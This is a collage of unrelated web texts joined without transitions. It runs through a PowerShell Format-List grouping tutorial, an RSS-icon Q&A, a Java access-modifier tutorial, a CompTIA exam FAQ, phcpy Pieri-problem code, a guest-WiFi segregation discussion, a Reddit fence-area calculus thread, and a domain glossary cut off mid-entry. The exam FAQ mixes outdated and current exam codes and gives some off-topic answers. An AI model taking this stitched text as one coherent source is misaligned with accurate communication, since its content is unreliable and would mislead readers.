As might be expected, this non-grouping behavior also exists with the Format-List cmdlet, which is a cmdlet that also contains the GroupBy parameter. The code that follows appears to group the output, until one takes a closer look at the output.
Get-Service | Format-List name, status -GroupBy status
A look at the output (shown in the following image) shows that the grouping occurs only when concurrent services share the same status.
Image of command output
The fix for the grouped output from the Format-List cmdlet is the same as the fix for the Format-Table cmdlet—first sort the output by using the Sort-Object cmdlet, then pipe the sorted service objects to the Format-List cmdlet for grouping. The revised code is shown here.
Get-Service | sort-object status | Format-List name, status -GroupBy status
The revised command and the associated sorted output from the command are shown in the image that follows.
Image of command output
One of the cool things to do with the Format-List cmdlet is to use a ScriptBlock in the GroupBy parameter. Once again, it is necessary to sort the output prior to sending it to the Format-List cmdlet. In fact, you may need to sort on more than one parameter, as illustrated in the code that follows. (This code is a single line command that is broken at the pipe character for readability).
Get-Service | sort-object status, canstop |
Format-List name, status -GroupBy {$_.status -eq 'running' -AND $_.canstop}
To make the output easier to assess, I added the Unique switched parameter to the Sort-Object cmdlet to shorten the output. Interestingly enough, the first condition reports two services for the first condition. This is because each -AND combination equals False.
Image of command output
Format-Table also accepts a ScriptBlock for the GroupBy parameter. It works the same way that the Format-List behaves. The code that follows creates two tables, one that evaluates to False, and one that evaluates to True.
Get-Service | sort-object status, canstop -unique |
Format-Table name, canstop, status -GroupBy {$_.status -eq 'running' -AND $_.canstop}
The image that follows illustrates creating a table that groups output based on a ScriptBlock.
Image of command output
Well, that is about all there is to grouping output information by using the Format-Table and the Format-List cmdlets.
I invite you to follow me on Twitter and Facebook. If you have any questions, send email to me at [email protected], or post your questions on the Official Scripting Guys Forum. See you tomorrow. Until then, peace.
Ed Wilson, Microsoft Scripting Guy
Comments (5)
1. K_Schulte says:
Hi Ed,
again something for the daily work toolbox!
And again, using script blocks increases the flexibility of "GroupBy" a lot!
Klaus (Schulte)
2. jrv says:
Useful:
Fully sorted list:
Get-Service | sort-object status,name | Format-List name -GroupBy status
3. @thommck says:
This is just what I was looking for.
One more thing I would like, how would I add a total as a summary.
I'm trying to output a table showing all the computers in AD along with their OS. I then want it grouped by OS and give me a total value for each (e.g. 700xXP, 300xWin7). Is that possible?
4. Amed H says:
Hi,
I have been searching for a way to split an ordered set of columns across the screen and I found none. I hear Powershell is the thing now so I hope it can be done.
Here's what I want:
Key Value
---   -----
C     1
A     2
D     3
I'd like the above to look like this instead:
Key Value   Key Value
---   ----- ---   -----
C     1     D     3
A     2
Thank you.
5. David Eaton says:
Amed H,
Format-Wide will put the columns across the screen but can only be used with a single column
On most websites, RSS feed icons are orange/red. For instance, here on Pro Webmasters the RSS feed icon is also orange (e.g., for tag subscriptions). Why is that?
Is there a convention that web developers follow when choosing the color of the RSS feed icon?
I think you're making this more complicated than it is. RSS is associated with orange because that's the way it's always been. The RSS icon is orange, and making the RSS menu orange too helps people recognize it better. – Christofian Jul 21 '12 at 15:34
"menu" - do you mean icon? – w3d Jul 21 '12 at 15:37
@w3d Yes the rss icon, but what's the reason for down vote? – Vijin Paulraj Jul 21 '12 at 18:13
Not sure of the down vote. But I think the answer is simply convention. As with all conventions, however, they do have their origins and @deathlock's answer appears to cover that quite well. – w3d Jul 21 '12 at 19:23
1 Answer
I remember the icon was first used in Mozilla Firefox and later adopted by Microsoft for Internet Explorer. Since then, the orange icon has become the web standard symbol for RSS.
I don't think there's any specific reason the RSS icon is orange, as various designers (showcased through web design blogs) have made alternatives in both color and shape. However, the orange color and rounded-square shape are easier to recognize because they have been used so widely.
The Wikipedia article for RSS also includes a bit of history behind the icon and backs up what you have already said: "In Dec 2005, the Microsoft Internet Explorer team and Microsoft Outlook team announced on their blogs that they were adopting the feed icon first used in the Mozilla Firefox browser. In Feb 2006, Opera Software followed suit. This effectively made the orange square with white radio waves the industry standard for RSS and Atom feeds, replacing the large variety of icons and text that had been used previously to identify syndication data." – w3d Jul 21 '12 at 19:29
In the previous article we covered method overriding in Java and how it differs from overloading. In this article we look at the Java keywords private, static, and final.
When we first introduced the concept of a Java class, we used a shopping-mall checkout counter as the example:
If we pay by card, we present a bank card or membership card with a sufficient balance and complete the payment simply by swiping the card and entering the password. During this process the cashier must not be able to see private data such as our card number, password, or balance; otherwise the card could be stolen from or otherwise abused. All the cashier needs to know is whether the password we enter matches the original password and whether the account balance is at least the price of the goods.
Based on this analysis, we can define a Card class:
class Card {
    private String cardId;   // card number
    private String cardPwd;  // password
    private double balance;  // balance

    public boolean payMoney(double money) { // make a payment
        if (balance >= money) {
            balance -= money;
            return true;
        }
        return false;
    }

    public boolean checkPwd(String pwd) { // check the password
        if (cardPwd.equals(pwd)) {
            return true;
        }
        return false;
    }
}
In the code above we declared the member variables with the modifier private and the methods with the modifier public. Let's look at the difference between private and public.
Member variables and methods marked private can only be accessed from within the class itself; those marked public can be accessed from anywhere.
In other words, private members form the internal, encapsulated implementation, while public members form the functionality the class exposes for others to call.
There are two more access control modifiers: protected and the default (writing nothing). Their access scopes are:
1) public: accessible from any class
2) private: accessible only within the class itself
3) protected: accessible from the class itself, its subclasses, and classes in the same package
4) default (nothing written): accessible from the class itself and classes in the same package
Next, let's look at the keyword static.
The variables we defined in classes so far are actually called instance variables. There is another kind, static variables, declared with the static keyword. Let's first compare the two:
1. Instance variables:
1) belong to an object and are stored on the heap
2) there is one copy per object
3) must be accessed through an object reference (objectName.)
2. Static variables:
1) belong to the class and are stored in the method area
2) there is only one copy
3) must be accessed through the class name (ClassName.)
The following code shows this in practice:
public class HelloWorld {
    public static void main(String[] args) {
        Aoo aoo1 = new Aoo();
        aoo1.show(); // a=1 b=1
        Aoo aoo2 = new Aoo();
        aoo2.show(); // a=1 b=2
    }
}

class Aoo {
    int a;
    static int b;

    Aoo() {
        a++;
        b++;
    }

    void show() {
        System.out.println("a=" + a);
        System.out.println("b=" + b);
    }
}
In the code above we define an instance variable a and a static variable b, instantiate Aoo twice, and call show() on each instance. The output shows that the value of a stays at 1: every instantiation creates its own fresh copy of a. The static variable b, however, changes with each instantiation: no new copy of b is created; each object keeps using the single shared one.
Next, let's look at static methods, also declared with the static keyword.
Static methods behave much like static variables, with one extra restriction:
1) they belong to the class and are stored in the method area
2) there is only one copy
3) they must be accessed through the class name (ClassName.)
4) they receive no implicit this, so instance variables cannot be accessed directly from a static method
class Aoo {
    int a;        // instance variable, accessed through an object reference
    static int b; // static variable, accessed through the class name

    void test1() { // instance method
        a++;
        b++;
    }

    static void test2() { // static method
        a++;     // compile error
        test1(); // compile error
        b++;
    }
}
In the code above, the static keyword makes b a static variable and test2() a static method. When we write a++ and b++ inside the instance method test1(), the compiler implicitly treats them as this.a++ and Aoo.b++. Inside test2(), however, there is no implicit this, so both a++ and the call to test1() fail to compile.
Next, let's look at static blocks, another use of the static keyword.
public class HelloWorld {
    public static void main(String[] args) {
        Aoo aoo1 = new Aoo(); // prints "static block" then "constructor"
        Aoo aoo2 = new Aoo(); // prints "constructor" only
    }
}

class Aoo {
    static {
        System.out.println("static block");
    }

    Aoo() {
        System.out.println("constructor");
    }
}
In the code above we give Aoo a constructor and, via static { }, a static block. After instantiating Aoo twice, we find that the static block runs only once, when the class is loaded, while the constructor runs once for every instantiation.
In practice, static blocks can be used to load static resources such as images, audio, and video exactly once. For example, when we browse Taobao the images are loaded once and reused; if they had to be reloaded for every single visit, the servers could not handle the load.
Finally, let's look at the final keyword.
1. final on a member variable: it must be initialized in one of two ways:
1) at the point of declaration
2) in the constructor
2. final on a local variable: it only needs to be assigned before it is used.
The code is as follows:
class Aoo {
    int a = 10;
    int b;
    final int c = 10; // initialized at declaration
    // final int d;   // compile error: declared but never initialized
    final int e;

    Aoo() {
        e = 10; // initialized in the constructor
    }

    void test() {
        final int f; // local variable: just assign before use; it need not be assigned if never used
        a = 20;
        // c = 20; // compile error: a final variable cannot be reassigned
    }
}
final on a method: a final method cannot be overridden.
The code is as follows:
class Aoo {
    void test() {}
    final void show() {}
}

class Boo extends Aoo {
    void test() {}
    void show() {} // compile error: a final method cannot be overridden
}
final on a class: a final class cannot be extended, but it can itself extend other classes.
The code is as follows:
class Aoo {}
class Boo extends Aoo {}
final class Coo extends Aoo {} // a final class may itself extend another class

final class Doo {}
class Eoo extends Doo {} // compile error: a final class cannot be extended
Question: How Long Does It Take To Study For A+ Exam?
How long does it take to be IT certified?
Certs that typically require about six months: these certifications are either two or three exams.
Sticking with the assumption that it takes three months to study per exam, these should be attainable in six months.
How difficult is the Network+ exam?
Overall, CompTIA Network+ is less challenging. There are three simple comparisons to put the word "hard" on the right scale. Alphaprep.net can make the studying process much more fun and passing the exam much easier. If you have more questions or need more explanation, just comment.
Is the A+ exam multiple choice?
The CompTIA A+ exams include a combination of multiple-choice questions, drag-and-drop activities and performance-based items. The multiple-choice questions are single and multiple response.
Should I take Network+ or Security+?
The CompTIA Security+ certification is a better choice than the CompTIA Network+ certification for most people looking to enter into the IT or cybersecurity fields because it validates a higher level of skill and knowledge, commands a higher salary, and offers more career options.
Which IT certifications should I get first?
10 entry-level IT certs to jump-start your career:
Cisco Certified Entry Networking Technician (CCENT)
Cisco Certified Technician (CCT)
Cisco Certified Network Associate (CCNA) Routing & Switching
CompTIA IT Fundamentals+ (ITF+)
CompTIA A+
CompTIA Network+
CompTIA Security+
Microsoft Technology Associate (MTA)
More items…
Which is harder A+ or Network+?
Reason #2: Network+ is not more difficult than the A+. This is because the Network+ isn't any more difficult than the A+, and in fact it may be easier than the A+ simply because of the tremendous amount of material on both A+ exams and the rote memorization much of the A+ material requires.
How can I pass a test without studying?
12 Study Hacks To Pass Exams Without Studying:
Keep panic at bay: This is probably the most important thing to remember.
Find a workplace you prefer: Find a suitable workplace that is comfortable and be ready to spend your last-minute jitters there.
More items…
What is the passing score for A+ certification?
Exam Details
Exam Codes: CompTIA A+ 220-1001 (Core 1) and 220-1002 (Core 2). Candidates must complete both 1001 and 1002 to earn certification. Exams cannot be combined across the series.
Length of Test: 90 minutes per exam
Passing Score: 220-1001: 675 (on a scale of 100-900); 220-1002: 700 (on a scale of 100-900)
How do you study for A+ exam?
Exam Study Tips for Passing the CompTIA A+ Exams:
Tip 1: Become familiar with the CompTIA A+ Exam Objectives. One of the first things you can do to prepare long before test day is to download the CompTIA Exam Objectives.
Tip 2: Become familiar with the inside of a computer.
Tip 3: Use additional study resources available on the Internet.
Tip 4: Take a few practice exams.
Do I need a+ before Network+?
Some students prefer to go through Network+ before the A+ certification exams. The CompTIA Network+ training course material is a bit less dense and focuses specifically on networking knowledge, while A+ covers a wide variety of topics. This makes Network+ easier for some students to complete.
Can I take the A+ Certification test online?
CompTIA understands the investment and effort you make in studying and training for your certification. In addition to taking an exam in person at a test center, CompTIA now offers online testing. Online testing allows you to: Test anywhere – especially from the security and privacy of your own home.
How long did you study for Network+?
After working with hundreds of test takers, they've found that 12 weeks or three months is the sweet spot for studying 30 minutes per day. With that said, Network+ is another entry-level certification. Reported CompTIA Network+ study times (N = 57):
Less than a month: 37% (21)
4 - 8 weeks: 16% (9)
9 - 12 weeks: 14% (8)
More than 3 months: 33% (19)
Is the A+ exam hard?
The CCNA is a hard test because there’s not a lot you can do to get familiar with the equipment, but the A+ can be learned pretty easily from the CompTIA certmaster coursework or from a study guide. It’s the entry level exam for basically the entire IT industry.
Is CompTIA A+ worth it 2020?
Being CompTIA A+ certified is definitely worth it when it comes to landing entry-level jobs. … Having the A+ can help you land entry-level IT jobs like desktop support or help desk tech. The new CompTIA A+ is a good place to start. It provides the foundational knowledge for bigger and better roles further down the line.
How can I get my A+ certification for free?
You can, in a way, get it for "free," but in reality that just means taking a local community college class. When I received my A+ certification, I was in college for an AS, and one of the classes I took for the certification included a waiver to take the test once for free, whether I passed or failed.
How much is the CompTIA A+ exam?
Although the cost of CompTIA A+ exams varies depending on country, the average price is $170. This translates to $340 for the two exams required to become fully certified. The examinations you need to take and pass are 220-901 and 220-902.
DO YOU NEED A+ for Security+?
There is absolutely ZERO need to get A+ or Network+ prior to studying Security+. The people quoting the recommended order are doing so for people who have no knowledge whatsoever of computers.
Can you self study for CompTIA A+?
Self-Study: As I mentioned before, I self-studied for the CompTIA A+ exams. It wasn't easy, but it is very possible. If you have a bit of experience from IT work or are a computer enthusiast, and are comfortable with the topics listed above, you may want to self-study for the exams.
Is a Network+ certification worth it?
Network+ is very helpful in getting you started with your IT career, but if you want to advance to the upper echelons in the field of IT networking, it is recommend that you also get intermediate and advanced level certifications like CCNA (Cisco Certified Network Associate), and CCNP (Cisco Certified Network …
Is CCNA Better Than Network+?
CCNA: Why IT Pros Should Earn CompTIA Network+ First. While CCNA covers select networking skills as they relate to Cisco routers, it can’t beat CompTIA Network+ for comprehensive networking skills that can be applied in a multi-vendor environment. …
Can you get a job with just a CompTIA A+ certification?
Of course it is possible to get a job with just an A+ certification. It is also possible to get a job with no certification at all. The question you’re really asking is if it is possible to get a job with an A+ certification that you wouldn’t have gotten without that credential. The answer to that is also ‘of course’.
lines meeting four given lines
Consider as given four lines, our problem is to compute all lines which meet the four given lines in a point. In Fig. 7, the four given lines are shown in blue while the lines that meet those four lines are drawn in red.
_images/figfourlines.png
Fig. 7 Two red lines meet four blue lines in a point. Their intersection points are marked by red disks.
A line in projective 3-space is represented by two points, stored in the columns of a 4-by-2 matrix. So the space we work in is the complex 4-space. For this problem we have a formal root count, named after Pieri.
from phcpy.schubert import pieri_root_count
rc = pieri_root_count(2, 2, 0, verbose=False)
In 4-space, the dimension of the input planes equals two and also the dimension of the output planes is two. The value returned in rc is two for this problem.
a general configuration
In a general configuration, random number generators are applied to determine the points which span the input lines. The solving of a general configuration is encapsulated in the function solve_general.
def solve_general(mdim, pdim, qdeg):
"""
Solves a general instance of Pieri problem, computing the
p-plane producing curves of degree qdeg which meet a number
of general m-planes at general interpolation points,
where p = pdim and m = mdim on input.
For the problem of computing the two lines which meet
four general lines, mdim = 2, pdim = 2, and qdeg = 0.
Returns a tuple with four lists.
The first two lists contain matrices with the input planes
and the solution planes respectively.
The third list is the list of polynomials solved
and the last list is the solution list.
"""
from numpy import array
from phcpy.schubert import random_complex_matrix
from phcpy.schubert import run_pieri_homotopies
dim = mdim*pdim + qdeg*(mdim+pdim)
ranplanes = [random_complex_matrix(mdim+pdim, mdim) \
for _ in range(0, dim)]
(pols, sols) = run_pieri_homotopies(mdim, pdim, qdeg, ranplanes, \
verbose=False)
inplanes = [array(plane) for plane in ranplanes]
outplanes = [solution_plane(mdim+pdim, pdim, sol) for sol in sols]
return (inplanes, outplanes, pols, sols)
The solutions returned by run_pieri_homotopies are converted into numpy matrices, as defined by the function solution_plane.
def solution_plane(rows, cols, sol):
"""
Returns a numpy array with as many rows
as the value of rows and with as many columns
as the value of cols, using the string
representation of a solution in sol.
"""
from numpy import zeros
from phcpy.solutions import coordinates
result = zeros((rows, cols), dtype=complex)
for k in range(cols):
result[k][k] = 1
(vars, vals) = coordinates(sol)
for (name, value) in zip(vars, vals):
i, j = (int(name[1]), int(name[2]))
result[i-1][j-1] = value
return result
For the verification of the intersection conditions, the matrices of the input planes are concatenated to the solution planes and the determinant of the concatenated matrix is computed.
def verify_determinants(inps, sols, verbose=True):
"""
Verifies the intersection conditions with determinants,
concatenating the planes in inps with those in the sols.
Both inps and sols are lists of numpy arrays.
Returns the sum of the absolute values of all determinants.
If verbose, then for all solutions in sols, the computed
determinants are printed to screen.
"""
from numpy import matrix, concatenate
from numpy.linalg import det
checksum = 0
for sol in sols:
if verbose:
print('checking solution\n', sol)
for plane in inps:
cat = concatenate([plane, sol], axis=-1)
mat = matrix(cat)
dcm = det(mat)
if verbose:
print('the determinant :', dcm)
checksum = checksum + abs(dcm)
return checksum
Then the main() function contains the following code.
(inp, otp, pols, sols) = solve_general(mdim, pdim, deg)
print('The input planes :')
for plane in inp:
print(plane)
print('The solution planes :')
for plane in otp:
print(plane)
check = verify_determinants(inp, otp)
print('Sum of absolute values of determinants :', check)
The polynomial system in pols with corresponding solutions in sols can be used as start system to solve specific problems, as will be done in the next section.
a real configuration
The solution of a real instance takes on input the system and corresponding solutions of a general instance.
def solve_real(mdim, pdim, start, sols):
"""
Solves a real instance of Pieri problem, for input planes
of dimension mdim osculating a rational normal curve.
On return are the planes of dimension pdim.
"""
from numpy import array
from phcpy.schubert import real_osculating_planes
from phcpy.schubert import make_pieri_system
from phcpy.trackers import track
oscplanes = real_osculating_planes(mdim, pdim, 0)
target = make_pieri_system(mdim, pdim, 0, oscplanes, False)
rtsols = track(target, start, sols)
inplanes = [array(plane) for plane in oscplanes]
outplanes = [solution_plane(mdim+pdim, pdim, sol) for sol in rtsols]
return (inplanes, outplanes, target, rtsols)
The code for the main() is similar as when calling solve_general(), as shown above at the end of the previous section.
The points which span the planes are in projective 3-space, represented by four coordinates. In projective space, the coordinates belong to equivalence classes: all nonzero multiples of the four coordinates represent the same point. To map the points into affine space, all coordinates are divided by the first coordinate. After this division, the first coordinate equals one and is omitted. This mapping is done by the function input_generators.
def input_generators(plane):
"""
Given in plane is a numpy matrix, with in its columns
the coordinates of the points which span a line, in 4-space.
The first coordinate must not be zero.
Returns the affine representation of the line,
after dividing each generator by its first coordinate.
"""
pone = list(plane[:,0])
ptwo = list(plane[:,1])
aone = [x/pone[0] for x in pone]
atwo = [x/ptwo[0] for x in ptwo]
return (aone[1:], atwo[1:])
The solutions of the Pieri homotopies are represented in a so-called localization pattern, where the second point has its first coordinate equal to zero. To map to affine 3-space, the second point is the sum of the two generators. The function output_generators below computes this mapping.
def output_generators(plane):
"""
Given in plane is a numpy matrix, with in its columns
the coordinates of the points which span a line, in 4-space.
The solution planes follow the localization pattern
1, *, *, 0 for the first point and 0, 1, *, * for
the second point, which means that the second point
in standard projective coordinates lies at infinity.
For the second generator, the sum of the points is taken.
The imaginary part of each coordinate is omitted.
"""
pone = list(plane[:,0])
ptwo = list(plane[:,1])
aone = [x.real for x in pone]
atwo = [x.real + y.real for (x, y) in zip(pone, ptwo)]
return (aone[1:], atwo[1:])
The complete script is available in the directory examples of the source code for phcpy.
The question I'm asking is, like all security, a bit open-ended, and ultimately - like all security - it involves a personal balance between ease/usability vs. risk/security:
• Should I let users' devices (1) communicate locally with each other on my WiFi AP, or (2) segregate them from each other, or (3) is there any "middle ground" between these choices?
The problem being, I don't know what user devices/applications' needs and expectations might be, nor how significant any convenience/inconvenience or security gain would be.
So I'm asking this to get a better sense of the security information and social considerations which I should take into account, and how I should assess the issues it raises, so that I can make a good quality informed decision.
Background:
My LAN is pretty simple on the WiFi side: a pfSense router that also acts as DHCP server, 3 network ports (WAN, wired LAN, Wireless AP), and firewall rules separating them.
In the past, I've handled Wifi by simply having a commodity AP on a dedicated interface of the router, setting up WPA2, device segregation, and access control on the AP, and creating rules on the router to prevent any WLAN interface traffic other than to/from the WAN. From the perspective of my LAN, WiFi security problem = solved.
I now want to "up my game" a bit. I'm swapping the commodity AP for a Netgear router running OpenWRT 15.05 as an AP, and configuring separate trusted vs. partially-trusted virtual APs (the first is for me and will use 802.1X, the second is for friends/family and will use WPA2, or WPA3 when it's out and widely supported). The two sets of traffic will be on separate VLANs between AP and router.
It's primarily the "friends and family" AP setup that's relevant in this question. I'm not at all concerned about wired LAN access, or inappropriate traffic "jumping" to a trusted device, because that can be managed with VLANs and firewall rules on the router itself. But if devices are on the AP, then I have to decide what setup to adopt on the AP itself, regarding inter-device traffic.
My issue:
In the past I would have automatically gone with configuring the AP so that devices are segregated - no direct traffic between them within the AP or LAN. But in this day and age, it occurs to me, people may want/need/expect their separate devices (and those of friends) to be able to communicate with each other on the WLAN. I don't have that need, so I'm not aware at all whether or how much blocking inter-device AP traffic might be an issue to some people.
Examples:
• Communication beneficial: (1) A friend with an iPhone + iPad who may need them to communicate. (2) Two friends might want to send a file between them in some way.
• Communication adverse: (1) A friend's Windows laptop could be malwared/exploited, and attempting to use its WLAN access to probe for other WiFi device MACs and data, or to listen into/modify their sessions. (2) A neighbour or passing wardriver could try to take advantage of the WLAN or "listen in" to communications on it.
There might be other risks I should take into account, but those seem to be the main risks related to WiFi segregation issues.
So there are good reasons why segregating user devices would be beneficial to my own peace of mind as well as the friends+family who use my WiFi. But how disruptive would it be, and is it still sensible or impractical to do it these days, given how fast usage (including direct user-to-user) might be converging? Or perhaps they use other technology like Bluetooth/NFC so it's not a problem at all?
The question:
I don't really have any good way to gauge how disruptive or okay blocking inter-device traffic would be for users and apps, and I don't have a real sense of the true extent to which it will actually benefit users or I in terms of security and privacy. I don't use any apps or devices myself, which would trigger this issue.
In an ideal world I'd like to segregate all WiFi devices from each other "on principle", but I don't know the impact of any disruption this could have, or how much of a problem it is (what solutions exist), if someone is disrupted.
It's also possible (hypothetically) that the real issue could be overwhelmingly the device to AP sessions + individual traffic, which can't be segregated anyway, perhaps this makes any device segregation security benefits miniscule in consequence.
So my question can be expressed like this:
• What is the realistic situation and facts I need, both about security and about current/medium term everyday WiFi usage/expectation/connectivity, to decide how to handle this?
• What usual approaches (other than "802.1X universally required") are adopted by people who have thought about this before configuring their setup?
What is the realistic situation and facts I need, both about security and about current/medium term everyday WiFi usage/expectation/connectivity, to decide how to handle this?
For enterprise networks, it is best practice to segregate devices from communicating with each other as the end users don't have an implied trust with one another (I don't trust everyone on the public wifi at starbucks, so they shouldn't be able to see my device on the network). On home networks, it's all about your acceptable risk and the answer is going to be "It depends". How advanced are your users? What type of applications do they run on the network? How many users are you talking about?
What usual approaches (other than "802.1X universally required") are adopted by people who have thought about this before configuring their setup?
I run a "guest" wireless for my family and friends because I don't trust them not to click on malicious links. The devices can see each other on the network, but there are rarely more than 4 devices on this access point. This is enough network segmentation for me, as all of my workstations and servers are on a separate network than the guest wireless.
On an enterprise BYOD network the assumption is almost everything sent by one device to another probably goes via the LAN as its work related, not directly from John's phone to Jane's phone, I'd guess? As the traffic isn't "social". With home wifi, social apps, games, file shares etc, the individuals are much closer connected and no IT dept or company policy is involved. So I'm not sure if business norms are a good guide to what's expected or done outside work, where people are informal and usually have a much more direct connection. I don't really know what apps/uses might be involved. I'm .. – Stilez Apr 13 '18 at 13:05
... trying to get a sense of whether I have a problem/conflict here, as much as what options I have if so. Malicious links are easy, they don't have LAN access. But direct traffic to other wifi devices, without going off the AP itself? In general, to what extent an issue/risk/benefit and to what extent no issue/risk/benefit, and information needed to balance them? – Stilez Apr 13 '18 at 13:13
I guess "Enterprise" wasn't the right word, I meant public access points in general. IMHO, the maintenance to segment each device individually is too much for a small home network. I would VLAN devices by their risk level, Guest devices, IOT devices, and your own servers/workstations each on a separate VLAN and not worry about micro segmentation. – Mrdeep Apr 13 '18 at 13:18
• I've already done that. My question isn't about separating by risk/category, its about pros and cons of allowing any WiFi connected devices on the "Family+friends" SSID/virtual AP, to communicate with others on the same virtual AP, within the AP vs not allowing them? – Stilez Apr 13 '18 at 18:00
[–]darthjochen
So you know you don't need fence on one side, so the sum of the other three sides needs to be equal to 80 feet right?
So l= length and w = width. We're gonna say that one of the w's is already used by the existing fence in the problem.
l + l + w = 80, which means that 2l + w = 80
And we know that the area of a rectangle is given by l*w
So we can solve for w in terms of l and find that w=80-2l
so now we can see that l*(80-2l)=area
Once there, you should see that this is an "open down" quadratic. That quadratic represents every possible area as a function of the length of one of the sides. Because it opens downward, its apex represents a maximum area, namely the largest the area can get.
[–][deleted]
Further, you could take the derivative of this parabola and set it to zero. This will be the local and global maximum. You can verify it is a maximum by numerically testing other points on the parabola, or by taking the second derivative at this point. If it is negative then it is the maximum; if positive, it is a local minimum. If it is zero, you know nothing about the curve, the world is likely ending, and you should seek shelter, for the dead are rising to kill us all.
[–]darthjochen
This is also a way it could be done. Just wasn't sure if calculus was an option, so didn't go into it.
So if you've got that skill under your belt, its probably an easier way to get the same problem done.
Also, happy cakeday Beefy!
[–][deleted]
Thanks.
[–]Skippertech[S]
Haha, well I still need some help. I'm looking to find "What should the dimensions of the kennel be if Kip wants to give his puppies as much area as possible? What is the area of the completed region?" What should I do? Thanks! :D
[–][deleted]
OK, so you see how we set up the area equation to be the function 80L - 2L^2, and you take the maximum of this equation. In this case we take the derivative and set it to zero: 80 - 4L = 0, or L = 20.
Now we only have 80 feet of fence, so 80 - 2L = W, or W = 40.
Now, finally, what is the area at the maximum? L*W = 800.
That was pretty easy right?
[–]Skippertech[S]
" L*W =800" you sure you dont mean 80??? haha. Still a bit confused, can you show me the answer to this, I have the area but not sure how you come about the " 80-4L=0 or L=20"
Thank you for all your help. You're saving me!
[–][deleted]
Do you know derivatives yet? The derivative is the rate of change or slope of a given curve. In this case the area is a function that is essentially a parabola. Now, the slope of a parabola is zero at its maximum/minimum, depending on whether it is a cup or a hill.
So to find the maximum of the area equation we set the derivative of the area function 80-4L equal to zero and solve for L.
[–]Skippertech[S]
help:(
[–][deleted]
How wide the fence will be is a function of the perimeter, which is 80, as we have 80 feet of fence, and the length of the fence.
So in essence you can have exactly 80 feet of fence for the 3 sides you must put up.
Now you must have 2 sides of length L and one side of length W,
and W + 2L = 80,
so W = 80 - 2L.
Now the area is equal to L times W, so
A = L*W. Since W = 80 - 2L, replacing W gives A = L(80 - 2L) = 80L - 2L^2.
This is the area of the pen as a function of the length L. The curve is at a maximum where the slope of the curve is zero; the slope is dA/dL, the change in A with respect to L:
dA/dL = 80 - 4L = 0
80 = 4L, so L = 20.
Now we plug this maximizing L back into the known equation for area,
A = 80L - 2L^2 (or A = L*W):
80(20) - 2(20)^2 = 20*40 = 800, so the area is 800. Also W = 80 - 2L = 40, just in case you were wondering.
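The whole computation above can be double-checked numerically; here is a small sketch (the function and variable names are mine, not from the thread):

```python
def area(length, perimeter=80):
    """Area of the pen: one side is the existing wall, so width = perimeter - 2*length."""
    return length * (perimeter - 2 * length)

# Brute-force scan over whole-number lengths from 0 to 40 feet.
best_length = max(range(41), key=area)

print(best_length)            # 20
print(80 - 2 * best_length)   # width: 40
print(area(best_length))      # 800
```

The brute-force scan agrees with the calculus: L = 20, W = 40, and a maximum area of 800 square feet.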
.jeju.kr FAQ
.jeju.kr Glossary of Technical Terms
.INT
A top-level domain devoted solely to international treaty organizations that have independent legal personality. Such organizations are not governed by the laws of any specific country, rather by mutual agreement between multiple countries. IANA maintains the domain registry for this domain.
A record
The representation of an IPv4 address in the DNS system.
AAAA record
The representation of an IPv6 address in the DNS system.
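The practical difference between A and AAAA records is simply the address family of the value. As a small illustration (a sketch using Python's standard ipaddress module, not part of any registry tooling described here):

```python
import ipaddress

def record_type(value):
    """Classify a DNS address record by the family of its value."""
    addr = ipaddress.ip_address(value)
    return "A" if addr.version == 4 else "AAAA"

print(record_type("93.184.216.34"))                       # A
print(record_type("2606:2800:220:1:248:1893:25c8:1946"))  # AAAA
```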
Administrative contact
The majority of registries require four contacts for a successful domain registration: Registrant, Administrative, Technical, and Billing. The Administrative contact is intended to represent the Registrant (owner) of the domain in any non-technical matters regarding the management of the domain. Certain extensions require the Administrative contact to confirm requests and accept notices about the domain name.
A-label
The ASCII-compatible encoded (ACE) representation of an internationalized domain name, i.e. how it is transmitted internally within the DNS protocol. A-labels always commence the with the prefix "xn--". Contrast with U-label.
ARPA
Originally a reference to the US Government agency that managed some of the Internet’s initial development, now a top-level domain used solely for machine-readable use by computers for certain protocols — such as for reverse IP address lookups, and ENUM. The domain is not designed for general registrations. IANA manages ARPA in conjunction with the Internet Architecture Board.
ASCII (American Standard Code for Information Interchange)
The standard for transmitting English (or "Latin") letters over the Internet. DNS was originally limited to Latin characters because it uses ASCII as its encoding format, although this has since been expanded by Internationalized Domain Names for Applications (IDNA).
Authoritative Name Server
A domain name server configured to host the official record of the contents of a DNS zone. Each Korean .jeju.kr domain name must have a set of these so computers on the Internet can find out the contents of that domain. The set of authoritative name servers for any given domain must be configured as NS records in the parent domain.
Automatic Renewal
The automatic renewal service offers customers the convenience of automatic billing for services ordered through the domain registrar. If automatic renewal is selected, the customer's credit card is charged automatically for the service, which avoids any interruption in service.
Billing Contact
The majority of registries require four contacts for a successful domain registration: Registrant, Administrative, Technical, and Billing. The Billing contact is responsible for the payment of the domain, and is usually assigned to the registrar managing the domain.
Caching Resolver
The combination of a recursive name server and a caching name server.
Cloaking Forwarding
Domains can be forwarded to another URL by using a forwarding service. Cloaking forwarding differs from Apache 301 forwarding in that the content of the destination URL is shown, while the URL bar continues to display the original domain name.
CNAME Record
A CNAME record (an abbreviation for Canonical Name record) is a type of resource record in the Domain Name System (DNS) used to specify that a domain name is an alias for another, "canonical" domain. CNAME has a very specific syntax rule: a CNAME can only be set up for a name that carries no other DNS records, which is why it is most commonly set up for the WWW subdomain.
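As an illustration, a CNAME alias in zone-file syntax might look like the following (hypothetical zone data, not from the source); note that the aliased name carries no other records:

```
; illustrative zone fragment
www.example.com.   3600  IN  CNAME  example.com.
example.com.       3600  IN  A      208.77.188.103
```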
Country-code top-level domain (ccTLD)
A class of top-level domains, generally assigned or reserved for a country, sovereign state, or territory. IANA is the organization responsible for ccTLD assignments. Since 2010 there have been two types of ccTLDs: two-letter ASCII TLDs and IDN TLDs, which consist of native-language characters. Each country or territory is able to impose certain restrictions and requirements on the ccTLD assigned to it.
Cross-Registry Information Service Protocol (CRISP)
The name of the working group at the IETF that developed the Internet Registry Information Service (IRIS), a next-generation WHOIS protocol replacement.
Delegation
Any transfer of responsibility to another entity. In the domain name system, one name server can provide pointers to more useful name servers for a given request by returning NS records. On an administrative level, sub-domains are delegated to other entities. IANA also delegates IP address blocks to regional Internet registries.
Deletion
Deletion of the domain results in the domain record being removed from the registry's database. The domain deletion procedure and its availability differ depending on each TLD's policy. Certain extensions require additional payment to delete a domain name.
DNS zone
A section of the Domain Name System name space. By default, the Root Zone contains all domain names; in practice, however, sections of this are delegated into smaller zones in a hierarchical fashion. For example, the .com zone would refer to the delegated portion of the DNS consisting of names ending in .com.
DNSSEC
